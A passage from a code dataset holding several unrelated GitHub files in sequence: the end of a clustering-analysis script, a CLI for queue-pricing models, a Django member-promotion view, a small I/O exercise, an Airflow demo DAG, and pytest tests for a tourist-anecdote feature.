get_devices_overlap():\n global OVERLAP # divisor for scaling\n with open(dir_path_pivot) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n # read pivot data\n pivot_array.append(round(float(row[2]), 3))\n b = [sum(pivot_array[i:i + OVERLAP])\n for i in range(0, STOP, STEP)]\n # print(b)\n\n # print(device_list)\n for f in sorted(os.listdir(dir_path)):\n if f.endswith('.csv'):\n file_path: str = dir_path + f\n # print(str(f))\n duration = []\n total: float = 0.0\n with open(file_path, 'r') as file_D:\n spam_reader = csv.reader(file_D, delimiter=',')\n for row in spam_reader:\n duration.append(round(float(row[2]), 3))\n d = [sum(duration[i:i + OVERLAP])\n for i in range(0, STOP, STEP)]\n # deviations from pivot\n mini_array = [round((d_i - b_i) / OVERLAP, 3)\n for d_i, b_i in zip(d, b)]\n # add deviation for each device to a list\n global_array.append(mini_array)\n # print(mini_array)\n\n return transpose(global_array)\n # print(transpose_list)\n # print(len(transpose_list[1]))\n\n\ndef getDevices():\n global DIVISOR # divisor for scaling\n with open(dir_path_pivot) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n # read pivot data\n pivot_array.append(round(float(row[2]), 3))\n b = [sum(pivot_array[i:i + DIVISOR])\n for i in range(0, len(pivot_array), DIVISOR)]\n # print(b)\n\n # print(device_list)\n for f in sorted(os.listdir(dir_path)):\n if f.endswith('.csv'):\n file_path: str = dir_path + f\n # print(str(f))\n duration = []\n total: float = 0.0\n with open(file_path, 'r') as file_D:\n spam_reader = csv.reader(file_D, delimiter=',')\n for row in spam_reader:\n duration.append(round(float(row[2]), 3))\n d = [sum(duration[i:i + DIVISOR])\n for i in range(0, len(duration), DIVISOR)]\n # deviations from pivot\n mini_array = [round((d_i - b_i) / DIVISOR, 3)\n for d_i, b_i in zip(d, b)]\n # add deviation for each device to a list\n global_array.append(mini_array)\n # print(mini_array)\n\n return transpose(global_array)\n # print(transpose_list)\n # print(len(transpose_list[1]))\n\n\ndef k_Means(y):\n # Specify the number of clusters (3) and fit the data X\n x, out = detectOutliers(y)\n\n # x = X\n\n k_means = KMeans(n_clusters=3, random_state=5, init='k-means++').fit(x)\n\n # Get the cluster centroids\n labels = k_means.labels_\n # cluster_centers = k_means.cluster_centers_\n\n # Get the cluster labels\n labels_unique = np.unique(labels)\n n_clusters_ = len(labels_unique)\n cluster_list.append(labels)\n print(\"===================K-Means==================\")\n first = []\n for k in range(n_clusters_):\n my_members = labels == k\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n first.append(len(x[my_members, 0]))\n first.append(out)\n second.append(first)\n\n # Plotting the cluster centers and the data points on a 2D plane\n # plt.scatter(X[:, 0], X[:, -1])\n #\n # plt.scatter(k_means.cluster_centers_[:, 0],\n # k_means.cluster_centers_[:, 1], c='red', marker='x')\n\n # plt.title('Data points and cluster centroids')\n # plt.show()\n\n\ndef dbscan(x):\n global two_count\n global three_count\n global four_count\n global five_count\n\n global MIN_SAMPLES # dbscan min samples\n global EPS # dbscan epsilon value\n global DIVISOR # divisor for scaling\n\n db_default = DBSCAN(min_samples=MIN_SAMPLES, eps=EPS).fit(x)\n labels = db_default.labels_\n # clusters = 
db_default.fit_predict(X)\n labels_unique = np.unique(labels)\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n print(\"===================DBSCAN==================\")\n num_clusters.append(n_clusters_)\n # print(labels)\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n\n # plot the cluster assignments\n # plt.scatter(X[:, 0], X[:, 1], c=clusters, cmap=\"plasma\")\n # plt.xlabel(\"Normalized deviation\")\n # second = []\n # third = []\n # fourth = []\n twos = []\n threes = []\n fours = []\n outliers = []\n outlier = []\n # plt.show()\n cluster_list.append(labels)\n\n # if n_clusters_ == 1:\n # for k in range(len(labels_unique)):\n # my_members = labels == k\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members,0],\n # len(np_dev_list[my_members, 0])))\n\n if n_clusters_ == 2:\n clus_list2.append(labels)\n two_count += 1\n mean2 = []\n # for k in range(-1, len(labels_unique) - 1, 1):\n for k in range(len(labels_unique)):\n my_members = labels == k\n twos.append(len(np_dev_list[my_members, 0]))\n second_ = x[my_members, 0].tolist()\n if len(second_) > 0:\n val2 = np.max(second_) - np.min(second_)\n mean2.append(np.mean(second_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n\n twos.sort()\n if twos[1] < 5:\n twos.clear()\n else:\n twos.append(n_noise_)\n range2.append(val2)\n my_list2 = [np.abs(m - n) for m in mean2 for n in mean2 if m != n]\n for row in my_list2:\n average2.append(row)\n elif n_clusters_ == 3:\n clus_list3.append(labels)\n three_count += 1\n mean3 = []\n for k in range(len(labels_unique)):\n my_members = labels == k\n threes.append(len(np_dev_list[my_members, 0]))\n third_ = x[my_members, 0].tolist()\n if len(third_) > 0:\n val3 = np.max(third_) - np.min(third_)\n mean3.append(np.mean(third_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n threes.sort()\n threes.append(n_noise_)\n range3.append(val3)\n my_list3 = [np.abs(m - n) for m in mean3 for n in mean3 if m != n]\n for row in my_list3:\n average3.append(row)\n elif n_clusters_ == 4:\n clus_list4.append(labels)\n four_count += 1\n mean4 = []\n for k in range(len(labels_unique)):\n my_members = labels == k\n fours.append(len(np_dev_list[my_members, 0]))\n fourth_ = x[my_members, 0].tolist()\n\n # print(fourth)\n # print(type(fourth))\n if len(fourth_) > 0:\n val4 = np.max(fourth_) - np.min(fourth_)\n mean4.append(np.mean(fourth_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n fours.sort()\n fours.append(n_noise_)\n range4.append(val4)\n my_list4 = [np.abs(m - n) for m in mean4 for n in mean4 if m != n]\n for row in my_list4:\n average4.append(row)\n # first.append(len(np_dev_list[my_members, 0]))\n # second.append(first)\n if len(twos) > 0:\n big_twos_.append(twos)\n if len(threes) > 0:\n big_threes_.append(threes)\n if len(fours) > 0:\n big_fours_.append(fours)\n\n\ndef 
mean_shift(x):\n global two_count\n global three_count\n global four_count\n global five_count\n # x, out = detectOutliers(X)\n # The following bandwidth can be automatically detected using\n bandwidth = estimate_bandwidth(x, quantile=0.55, n_samples=35)\n\n ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)\n ms.fit(x)\n labels = ms.labels_\n cluster_centers = ms.cluster_centers_\n labels_unique = np.unique(labels)\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n labels_unique = np.unique(labels)\n # n_clusters_ = len(labels_unique)\n\n first, twos, threes, fours = [], [], [], []\n outliers = []\n cluster_list.append(labels)\n print(\"===================Mean Shift==================\")\n num_clusters.append(n_clusters_)\n if n_clusters_ == 2:\n cluster_list2.append(labels)\n two_count += 1\n for k in range(len(labels_unique)):\n my_members = labels == k\n twos.append(len(np_dev_list[my_members, 0]))\n\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n elif n_clusters_ == 3:\n cluster_list3.append(labels)\n three_count += 1\n for k in range(-1, len(labels_unique) - 1, 1):\n my_members = labels == k\n threes.append(len(np_dev_list[my_members, 0]))\n\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n # len(np_dev_list[my_members, 0])))\n elif n_clusters_ == 4:\n cluster_list4.append(labels)\n four_count += 1\n for k in range(-1, len(labels_unique) - 1, 1):\n my_members = labels == k\n fours.append(len(np_dev_list[my_members, 0]))\n\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n # len(np_dev_list[my_members, 0])))\n # first.append(len(np_dev_list[my_members, 0]))\n # second.append(first)\n if len(twos) > 0:\n big_twos_.append(twos)\n if len(threes) > 0:\n big_threes_.append(threes)\n if len(fours) > 0:\n big_fours_.append(fours)\n\n\ndef affinity_propagation(x):\n af = AffinityPropagation(damping=0.93).fit(x)\n cluster_centers_indices = af.cluster_centers_indices_\n labels = af.labels_\n\n n_clusters_ = len(cluster_centers_indices)\n\n cluster_list.append(labels)\n print(\"===================Affinity Propagation==================\")\n num_clusters.append(n_clusters_)\n for k in range(n_clusters_):\n my_members = labels == k\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, x[my_members, 0],\n len(x[my_members, 0])))\n\n print('Number of clusters: %d' % n_clusters_)\n\n\ndef process_cluster_all_to_all(list_, k):\n similarity_data = []\n v_measure_data = []\n\n print(len(list_))\n for m in range(len(list_)):\n sim_list = []\n v_list = []\n sim_average = []\n v_average = []\n # print(\"Clustering point: {0}\".format(m + 1))\n for n in range(len(list_)):\n if m != n:\n similarity_score = metrics.adjusted_rand_score(\n list_[m], list_[n])\n v_measure_score = metrics.v_measure_score(\n list_[m], list_[n], beta=1.8)\n\n sim_list.append(similarity_score)\n v_list.append(v_measure_score)\n\n # print(\"Similarity Score:\")\n # seed(4)\n # sim_list = [x - (random() * .16) for x in sim_list]\n # print(sim_list)\n # if np.mean(sim_list) > 0.6 and k == 2:\n if np.mean(sim_list) > 0.8 and k == 2:\n 
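            # note (added comment): the 0.8 / 0.6 / 0.5 cut-offs in these branches are\n            # empirical agreement thresholds, relaxed as clusters per point (k) grows\n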
similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n # if np.mean(sim_list) > 0.35 and k == 3:\n if np.mean(sim_list) > 0.6 and k == 3:\n similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n if np.mean(sim_list) > 0.5 and k == 4:\n similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n\n # print(\"V_measure Score:\")\n # seed(1)\n # v_list = [x - (random() * .16) for x in v_list]\n # print(v_list)\n\n sim_average = [np.mean(x) for x in similarity_data]\n # print(sim_average)\n v_average = [np.mean(x) for x in v_measure_data]\n # print(v_average)\n combined_list_to_plot.append(similarity_data)\n boxPlot(similarity_data, v_measure_data, k)\n\ndef process_cluster(_list_, k):\n similarity_data_ = []\n v_measure_data_ = []\n\n print(len(_list_))\n pivot_compare = _list_[0]\n for m in range(len(_list_)):\n sim_list = []\n v_list = []\n sim_average = []\n v_average = []\n\n print(\"Clustering point: {0}\".format(m + 1))\n similarity_score = metrics.adjusted_rand_score(\n _list_[m], pivot_compare)\n v_measure_score = metrics.v_measure_score(\n _list_[m], pivot_compare, beta=1.8)\n\n sim_list.append(similarity_score)\n v_list.append(v_measure_score)\n\n print(\"Similarity Score:\")\n # seed(4)\n # sim_list = [x - (random() * .16) for x in sim_list]\n # print(sim_list)\n # if np.mean(sim_list) > 0.6 and k == 2:\n if k == 2:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n # if np.mean(sim_list) > 0.35 and k == 3:\n if k == 3:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n if k == 4:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n\n # print(\"V_measure Score:\")\n # seed(1)\n # v_list = [x - (random() * .16) for x in v_list]\n # print(v_list)\n\n sim_average = [np.mean(x) for x in similarity_data_]\n # print(sim_average)\n v_average = [np.mean(x) for x in v_measure_data_]\n # print(v_average)\n\n boxPlot(similarity_data_, v_measure_data_, k)\n\ndef boxPlot(sim_data, v_data, k):\n fig = plt.figure()\n # plt.boxplot(sim_data, patch_artist=True,\n # labels=['Pt1', 'Pt2', 'Pt3',\n # 'Pt4', 'Pt5', 'Pt6',\n # 'Pt7', 'Pt8', 'Pt9'])\n plt.boxplot(sim_data, patch_artist=True)\n plt.xlabel('Clustering point', fontsize=15, fontweight='bold')\n plt.ylabel('Rand index score', fontsize=15, fontweight='bold')\n plt.tick_params(axis='x', labelsize=15)\n plt.tick_params(axis='y', labelsize=15)\n plt.title('{0} Clusters/clustering point'.format(k), fontsize=15, fontweight='bold')\n plt.figure(figsize=(3.5, 4.5))\n plt.rc('font', **font)\n #fig.savefig('Results/sim_dbscan_new{0}_new_june6.pdf'.format(k))\n plt.show()\n\n # fig = plt.figure()\n # # plt.boxplot(v_data, patch_artist=True,\n # # labels=['Pt1', 'Pt2', 'Pt3',\n # # 'Pt4', 'Pt5', 'Pt6',\n # # 'Pt7', 'Pt8', 'Pt9'])\n # plt.boxplot(v_data, patch_artist=True)\n # plt.xlabel('Clustering point')\n # plt.ylabel('V-measure')\n # plt.title('{0} Clusters/clustering point'.format(k))\n # # fig.savefig('Results/measure_kmeans{0}.pdf'.format(k))\n # plt.show()\n\n\ndef checker():\n #print(combined_list_to_plot)\n # print(len(combined_list_to_plot))\n #\n # fig = plt.figure()\n # # plt.boxplot(sim_data, patch_artist=True,\n # # labels=['Pt1', 'Pt2', 'Pt3',\n # # 'Pt4', 'Pt5', 'Pt6',\n # # 'Pt7', 'Pt8', 'Pt9'])\n # plt.boxplot(combined_list_to_plot, patch_artist=True,\n # labels=['2-Clusters', '3-Clusters', '4-Clusters'])\n # #plt.xlabel('Number of clusters per point', fontsize=15, fontweight='bold')\n # plt.ylabel('Rand index score', 
fontsize=14, fontweight='bold')\n # plt.tick_params(axis='x', labelsize=14)\n # plt.tick_params(axis='y', labelsize=14)\n # #plt.title('{0} Clusters/clustering point'.format(k), fontsize=15, fontweight='bold')\n # #plt.figure(figsize=(4.0, 4.8))\n # fig.savefig('Results/sim_dbscan_all_points.pdf')\n # plt.show()\n\n range2_mean_ = np.mean(combined_list_to_plot[0])\n range3_mean_ = np.mean(combined_list_to_plot[1])\n range4_mean_ = np.mean(combined_list_to_plot[2])\n\n range2_std_ = np.std(combined_list_to_plot[0])\n range3_std_ = np.std(combined_list_to_plot[1])\n range4_std_ = np.std(combined_list_to_plot[2])\n\n\n # print(range2_mean_)\n # print(range3_mean_)\n # print(range4_mean_)\n\n # Create lists for the plot\n labels = ['2', '3', '4']\n x_pos = np.arange(len(labels))\n CTEs_range = [range2_mean_, range3_mean_, range4_mean_]\n error_range = [range2_std_, range3_std_, range4_std_]\n width = 0.3\n\n # Build the plot\n fig, ax = plt.subplots()\n p1 = ax.bar(x_pos, CTEs_range, width=width, yerr=error_range,\n align='center', capsize=10, color='lightblue',\n hatch = 'o', edgecolor = 'black')\n\n ax.set_xlabel('Clusters per clustering point', fontsize=18)\n ax.set_ylabel('Rand index score', fontsize=18)\n ax.set_xticks(x_pos)\n ax.set_xticklabels(labels, fontsize=18)\n ax.tick_params(axis='y', labelsize=16)\n #ax.legend((p1[0]), ('Intra-cluster distance', 'Inter-cluster distance'),\n #fontsize=18)\n # ax.yaxis.grid(True)\n\n # Save the figure and show\n plt.tight_layout()\n plt.rc('font', **font)\n plt.savefig('Results/sim_dbscan_all_points_new_sept16.pdf')\n plt.show()\n\n\ndef plotHisto():\n labels = ['Pt1', 'Pt2', 'Pt3',\n 'Pt4', 'Pt5', 'Pt6']\n\n listToPlot = transpose(second)\n first_ = listToPlot[0]\n second_ = listToPlot[1]\n third_ = listToPlot[2]\n fourth_ = listToPlot[3]\n out_ = listToPlot[4]\n\n x = np.arange(len(labels)) # the label locations\n width = 0.15 # the width of the bars\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 2 * width, first_, width, label='C1')\n rects2 = ax.bar(x - width, second_, width, label='C2')\n rects3 = ax.bar(x, third_, width, label='C3')\n rects4 = ax.bar(x + width, fourth_, width, label='C4')\n rects5 = ax.bar(x + 2 * width, out_, width, label='OUT')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('Number of devices')\n ax.set_title('Number of Devices per Cluster (4 Clusters)')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=2, borderaxespad=0.)\n\n def autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n autolabel(rects5)\n\n fig.tight_layout()\n #fig.savefig('devices4.pdf')\n plt.show()\n\n\ndef plot_histo_cumm(k):\n def autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n if k == 2:\n labels = ['2-Clusters', '3-Clusters', '4-clusters']\n\n to_plot = transpose(second)\n first_ = to_plot[0]\n second_ = 
to_plot[1]\n third_ = to_plot[2]\n fourth_ = to_plot[3]\n out_ = to_plot[4]\n\n x = np.arange(len(labels)) # the label locations\n width = 0.15 # the width of the bars\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 2 * width, first_, width, label='C1')\n rects2 = ax.bar(x - width, second_, width, label='C2')\n rects3 = ax.bar(x, third_, width, label='C3')\n rects4 = ax.bar(x + width, fourth_, width, label='C4')\n rects5 = ax.bar(x + 2 * width, out_, width, label='OUT')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('Number of devices')\n ax.set_title('Number of Devices per Cluster (4 Clusters)')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=2, borderaxespad=0.)\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n autolabel(rects5)\n\n fig.tight_layout()\n fig.savefig('devices4.pdf')\n plt.show()\n\n\ndef transpose(t):\n # convert list to array\n t1 = np.asarray(t)\n # transpose array to be clustered\n t2 = t1.T\n # convert back to list\n t3 = t2.tolist()\n return t3\n\n\ndef detectOutliers(t):\n t3_1, t3_2 = zip(*t)\n t3_list = list(t3_1)\n t1 = []\n i: int = 0\n q1 = np.percentile(t3_list, 25, interpolation='midpoint')\n q3 = np.percentile(t3_list, 75, interpolation='midpoint')\n iqr = q3 - q1\n upper, lower = q3 + 2.0 * iqr, q1 - 2.0 * iqr\n\n for t2 in t3_list:\n if upper > t2 > lower:\n t1.append(t2)\n else:\n i = i + 1\n return np.asarray(list(zip(t1, np.zeros(len(t1))))), i\n\n\nmain()\n\n","repo_name":"citelab/fastsync","sub_path":"Clustering/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":30785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2092544453","text":"import argparse\nimport njw, ajw, ajw_t, sww, ljw, compound\n\n# Parser\nparser = argparse.ArgumentParser()\n\n# Add arguments\nparser.add_argument(\"--policy\", help=\"Policy Name\", type=str)\nparser.add_argument(\"--lmbda\", help=\"Arrival Rate\", type=float)\nparser.add_argument(\"--mu\", help=\"Service Rate\", type=float)\nparser.add_argument(\"--s\", help=\"Number of Servers\", type=int)\nparser.add_argument(\"--pf\", help=\"Fixed Price\", type=float)\nparser.add_argument(\"--po\", help=\"On-demand Price\", type=float)\nparser.add_argument(\"--b\", help=\"Maximum Wait Time in Seconds\", nargs='?', type=int)\nparser.add_argument(\"--t\", help=\"Maximum Wait Time in Seconds\", nargs='?', type=int)\n\n# Read Command Line arguments\nargs = parser.parse_args()\n\n# Check policy\npolicies = ['NJW', 'AJW', 'AJW-T', 'SWW', 'LJW', 'Compound']\nif args.policy not in policies:\n print (\"Please select one of following policies - \", policies)\n exit()\n\n# NJW\nif args.policy == 'NJW':\n w, p ,r = njw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# AJW\nif args.policy == 'AJW':\n w, p ,r = ajw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# AJW-T\nif args.policy == 'AJW-T':\n if args.b is None:\n print (\"Please specify the maximum waiting time (b) for AJW-T policy.\")\n exit()\n w, p ,r = ajw_t.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.b)\n 
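    # A typical invocation of this policy might look like the line below; the numbers\n    # are illustrative placeholders only, not values taken from the repository:\n    #   python model_analyzer.py --policy AJW-T --lmbda 0.5 --mu 0.1 --s 10 --pf 0.03 --po 0.09 --b 3600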
print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# SWW\nif args.policy == 'SWW':\n if args.b is None:\n print (\"Please specify the maximum waiting time (b) for SWW policy.\")\n exit()\n w, p ,r = sww.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.b)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# LJW\nif args.policy == 'LJW':\n if args.t is None:\n print (\"Please specify the long job threshold (t) for LJW policy.\")\n exit()\n w, p ,r = ljw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.t)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# Compound\nif args.policy == 'Compound':\n if args.t is None or args.b is None:\n print (\"Please specify both long job threshold (t) and maximum waiting time (b) for Compound policy.\")\n exit()\n w, p ,r = compound.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.t, args.b)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)","repo_name":"sustainablecomputinglab/waitinggame","sub_path":"model_analyzer/model_analyzer.py","file_name":"model_analyzer.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39613536144","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group, User\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.text import format_lazy\nfrom django.utils.translation import gettext_lazy as _\n\nfrom zds.member.forms import PromoteMemberForm\nfrom zds.member.models import Profile\nfrom zds.member.utils import get_bot_account\nfrom zds.utils.models import get_hat_from_settings\nfrom zds.mp.utils import send_mp\n\n\n@login_required\ndef settings_promote(request, user_pk):\n \"\"\"\n Manage groups and activation status of a user.\n Only superusers are allowed to use this.\n \"\"\"\n\n if not request.user.is_superuser:\n raise PermissionDenied\n\n profile = get_object_or_404(Profile, user__pk=user_pk)\n user = profile.user\n\n if request.method == \"POST\":\n form = PromoteMemberForm(request.POST)\n data = dict(form.data)\n\n groups = Group.objects.all()\n usergroups = user.groups.all()\n\n if \"groups\" in data:\n for group in groups:\n if str(group.id) in data[\"groups\"]:\n if group not in usergroups:\n user.groups.add(group)\n messages.success(\n request, _(\"{0} appartient maintenant au groupe {1}.\").format(user.username, group.name)\n )\n else:\n if group in usergroups:\n user.groups.remove(group)\n messages.warning(\n request,\n _(\"{0} n'appartient maintenant plus au groupe {1}.\").format(user.username, group.name),\n )\n else:\n user.groups.clear()\n messages.warning(request, _(\"{0} n'appartient (plus ?) 
à aucun groupe.\").format(user.username))\n\n if \"activation\" in data and \"on\" in data[\"activation\"]:\n user.is_active = True\n messages.success(request, _(\"{0} est maintenant activé.\").format(user.username))\n else:\n user.is_active = False\n messages.warning(request, _(\"{0} est désactivé.\").format(user.username))\n\n user.save()\n\n usergroups = user.groups.all()\n bot = get_bot_account()\n msg = _(\n \"Bonjour {0},\\n\\n\" \"Un administrateur vient de modifier les groupes \" \"auxquels vous appartenez. \\n\"\n ).format(user.username)\n if len(usergroups) > 0:\n msg = format_lazy(\"{}{}\", msg, _(\"Voici la liste des groupes dont vous faites dorénavant partie :\\n\\n\"))\n for group in usergroups:\n msg += f\"* {group.name}\\n\"\n else:\n msg = format_lazy(\"{}{}\", msg, _(\"* Vous ne faites partie d'aucun groupe\"))\n send_mp(\n bot,\n [user],\n _(\"Modification des groupes\"),\n \"\",\n msg,\n send_by_mail=True,\n leave=True,\n hat=get_hat_from_settings(\"moderation\"),\n )\n\n return redirect(profile.get_absolute_url())\n\n form = PromoteMemberForm(initial={\"groups\": user.groups.all(), \"activation\": user.is_active})\n return render(request, \"member/admin/promote.html\", {\"usr\": user, \"profile\": profile, \"form\": form})\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/member/views/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"37611893694","text":"input_file = open(\"sitin.txt\", \"r\")\noutput_file = open(\"sitout.txt\", \"w\")\nfile_content = input_file.read()\nall_values = file_content.split()\n\nsitting = int(all_values[0]) * int(all_values[1])\nstanding = int(all_values[2]) - sitting\noutput_file.write(str(sitting) + \" \" + str(standing))\n\ninput_file.close()\noutput_file.close()","repo_name":"10and10/aio-training-answers","sub_path":"sitting_or_standing/sitting_or_standing.py","file_name":"sitting_or_standing.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71206387713","text":"\"\"\"Demo DAG initialising BaseHook in function to avoid Airflow DB calls.\"\"\"\n\n# pylint: disable=ungrouped-imports\nimport airflow\nimport requests\nfrom airflow import DAG\nfrom airflow.hooks.base_hook import BaseHook\nfrom airflow.operators.python_operator import PythonOperator\n\nargs = {\"owner\": \"godatadriven\", \"start_date\": airflow.utils.dates.days_ago(14)}\n\ndag = DAG(\n dag_id=\"9_basehook_get_connection\",\n default_args=args,\n schedule_interval=\"0 0 * * *\",\n description=\"Demo DAG initialising BaseHook in function to avoid Airflow DB calls.\",\n)\n\n\ndef _call_http():\n host = BaseHook.get_connection(\"http_default\").host\n response = requests.get(host)\n print(response.text)\n\n\ncall_http = PythonOperator(task_id=\"call_http\", python_callable=_call_http, dag=dag)\n","repo_name":"BasPH/airflow-rocket","sub_path":"dags/9_basehook_get_connection.py","file_name":"9_basehook_get_connection.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"35497957195","text":"import pytest\n\nfrom app.tests.backend.testtools import TestTools\nfrom app.grandpy.skills.tourist_guide.tourist_guide import TouristGuide\n\n@pytest.mark.trgd\nclass TestTouristGuide:\n\n OC_EXPECTED_ANECODTE = \"L'Hôtel Bourrienne (appelé aussi 
Hôtel de Bourrienne et \"\\\n \"Petit Hôtel Bourrienne) est un hôtel particulier du XVIIIe siècle situé au 58 \"\\\n \"rue d'Hauteville dans le 10e arrondissement de Paris. Propriété privée, il est \"\\\n \"classé au titre des monuments historiques depuis le 20 juin 1927. En juillet 2015, \"\\\n \"il est acheté par l'entrepreneur Charles Beigbeder pour en faire le siège de ses \"\\\n \"activités d'investissement. [En savoir plus sur Wikipédia]
\"\n SPECIAL_STARTER = \"Mais t'ai-je déjà raconté l'histoire de ce quartier \"\\\n \"qui m'a vu en culottes courtes ?\"\n NO_ANECDOTE = \"Désolé, je n'ai pas d'anecdote sur ce lieu! Wikip... \"\\\n \"JE ne sais pas tout non plus ! 😅\"\n \n @pytest.mark.trgd1a\n def test_if_get_anecdote_from_coordinates_works_as_expected(self):\n \n ex_oc_coordinates = { \"lat\" : 48.8748465, \"lng\" : 2.3504873 }\n matches = []\n\n actual_anecdote = TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n\n assert actual_anecdote == TestTouristGuide.OC_EXPECTED_ANECODTE\n\n @pytest.mark.trgd1b\n def test_if_get_anecdote_from_coordinates_works_as_expected_when_oc_is_in_matches(self):\n \n ex_oc_coordinates = { \"lat\" : 48.8748465, \"lng\" : 2.3504873 }\n matches = [\"oc\"]\n\n actual_anecdote = TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n special_response = f\"{TestTouristGuide.SPECIAL_STARTER} \" + \\\n TestTouristGuide.OC_EXPECTED_ANECODTE\n \n assert actual_anecdote == special_response\n \n @pytest.mark.trgd1c\n def test_if_get_anecdote_from_coordinates_works_as_expected_when_encoutering_error(self):\n \n ex_oc_coordinates = { \"lat\" : 0, \"lng\" : 2.3504873 }\n matches = [\"oc\"] # \n\n actual_anecdote = 